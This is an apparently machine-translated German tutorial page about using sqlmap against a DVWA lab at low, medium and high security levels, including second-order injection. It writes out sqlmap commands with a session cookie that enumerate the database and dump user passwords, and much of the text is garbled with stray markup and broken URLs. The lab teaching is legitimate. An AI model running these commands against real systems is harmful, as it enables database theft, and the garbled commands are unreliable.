Beispielanalyse der automatisierten Sqlmap-Injektion

WBOY
Freigeben: 2023-05-13 15:31:13
nach vorne
1153 Leute haben es durchsucht

Verwenden Sie SQLMAP, um die DVWA-Injektion zu automatisieren.
Stellen Sie den DVWA-Level auf niedrig ein # SQL-Injection (Blind)
), Browser-Debugging öffnen, Benutzer-ID eingeben und absenden, um die abgefangenen Anfragen anzuzeigen.

  1. Sie können sehen, dass es sich um eine GET-Anfrage handelt, die URL „http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/? id=1&Submit =Submit#“

  2. Lassen Sie es uns direkt in Salmap einfügen, um es zu testen. Verwenden Sie dazu den Befehl -u -u "http://192.168 .1.222:8089/vulnerabilities /sqli/?id=1&Submit=Submit#"


  3. Sie können sehen, dass Sie sich hier anmelden müssen, andernfalls müssen Sie sich anmelden kann nicht ausgehen. Daher müssen wir ein Cookie hinzufügen, um die Anmeldung beizubehalten


    Sie können sehen, dass die Datenbank, die ausgebrochen ist, MySQL ist

  4. 7. Wir verwenden -D xxx, um die anzuzeigende Datenbank anzugeben, und verwenden --tables, um alle Tabellen anzuzeigen in der Datenbank: -u "http://192.168.1.222:8089/ vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tables#🎜 🎜#
  5. Anzeigen der laufenden Ergebnisse:

    # 🎜🎜#8 Wir verwenden -D xxx -T ttt, um die anzuzeigende Tabelle anzugeben, und verwenden --columns, um die Spalten der Tabelle anzuzeigen #🎜 🎜#
    -u "http://192.168.1.222:8089/vulnerabilities/sqli /?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T Benutzer --columns

  6. 9 Wir verwenden -D xxx zum Anzeigen der Datenbank, -T xxx geben die anzuzeigende Tabelle an, verwenden -C xxx zum Anzeigen der Spalten der Tabelle und verwenden -dump zum Anzeigen die Spaltendaten

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id =1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" - D dvwa -T Benutzer -C Passwort,Benutzer --dump

# 🎜🎜#Stellen Sie die dvwa-Sicherheitsstufe auf mittel ein und speichern Sie die erfassten Datenpakete als .txt-Dateien Legen Sie sie direkt im SQLMap-Verzeichnis ab -r Dateiname --dbs (Sie können nachfolgende Parameter selbst hinzufügen)

#🎜 🎜#

Stellen Sie die DVWA-Sicherheitsstufe auf hoch ein. Da die Übermittlungsseite dieses Mal nicht dieselbe Seite ist wie die Seite, die die Ergebnisse zurückgibt, kann die vorherige Methode hier nicht verwendet werden. So verwenden Sie die Injektionsmethode zweiter Ordnung#🎜🎜 ## 🎜🎜 ## 🎜🎜 ## 🎜🎜 ## 🎜🎜 ## 🎜🎜 ## 🎜🎜#Website einreichen#🎜🎜 ## 🎜🎜##🎜 🎜 #

  • Zurückgegebene URL


  • # 🎜 🎜#

    Speichern Sie das erfasste Datenpaket als .txt-Datei, legen Sie es im SQLMap-Verzeichnis ab, explodieren Sie die Datenbank, Befehl:
  • -r 1.txt --second-url#🎜 🎜#

    "http://192.168.1.222:8089/vulnerabilities/sqli/" --             Batch --level 2 --dbs

    #🎜 🎜#
  •          
  •                                                                            ‐                           🎜🎜#- r 1.txt --second-url "http://192.168.1.222:8089 /vulnerabilities/sqli/" - -batch --level 2 -D dvwa --tables

  •        
  • #🎜🎜 #                                                                             🎜🎜#-r 1 .txt --second-url. "http://192.168.1.222 :8089/vulnerabilities/sqli/"

  • -- Batch - -level 2 -D dvwa - T user --columns

  Felddaten auflösen#🎜🎜 ## 🎜 🎜#

-r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" -- Batch --level 2 -D dvwa -T Benutzer -C Benutzer,Passwort --dump

#Einige konzeptionelle Fragen: #🎜🎜 #

Injektion zweiter Ordnung: Zweite Ordnung SQL-Injektion- -zweite Ordnung Manchmal, wenn die Dateneingabe am Injektionspunkt erfolgt zurückgegeben wird, ist das Ergebnis nicht die aktuelle Seite, sondern eine andere Seite. In diesem Fall müssen Sie angeben, von welcher Seite die Antwort erhalten werden soll, um festzustellen, ob sie wahr oder falsch ist. –second-url gefolgt von der URL-Adresse der zurückgegebenen Seite

--batch: automatische Standardkonfiguration, kein manuelles Drücken erforderlich ja oder nein

  • level :Sqlmap hat insgesamt 5 Erkennungsstufen, der Standardwert ist 1. Je höher die Stufe, desto mehr Nutzlasten werden bei der Erkennung verwendet. Unter diesen verfügt Level 5 über die meisten Nutzlasten und knackt und injiziert automatisch Header wie Cookies und XFF. Je höher der Pegel, desto langsamer ist natürlich die Erkennungszeit. Dieser Parameter wirkt sich auf den Injektionspunkt des Tests aus. GET- und POST-Daten werden getestet, wenn die Stufe 2 ist. Der HTTP-User-Agent/Referer-Header wird getestet, wenn die Stufe 3 ist. Wenn Sie nicht sicher sind, welcher Parameter der Einspritzpunkt ist, wird zur Gewährleistung der Genauigkeit empfohlen, die Stufe auf 5 einzustellen (die Geschwindigkeit wird auch langsamer)

  • Das obige ist der detaillierte Inhalt vonBeispielanalyse der automatisierten Sqlmap-Injektion. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

    Verwandte Etiketten:
    Quelle:yisu.com
    Erklärung dieser Website
    Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
    Beliebte Tutorials
    Mehr>
    Neueste Downloads
    Mehr>
    Web-Effekte
    Quellcode der Website
    Website-Materialien
    Frontend-Vorlage
    Über uns Haftungsausschluss Sitemap
    Chinesische PHP-Website:Online-PHP-Schulung für das Gemeinwohl,Helfen Sie PHP-Lernenden, sich schnell weiterzuentwickeln!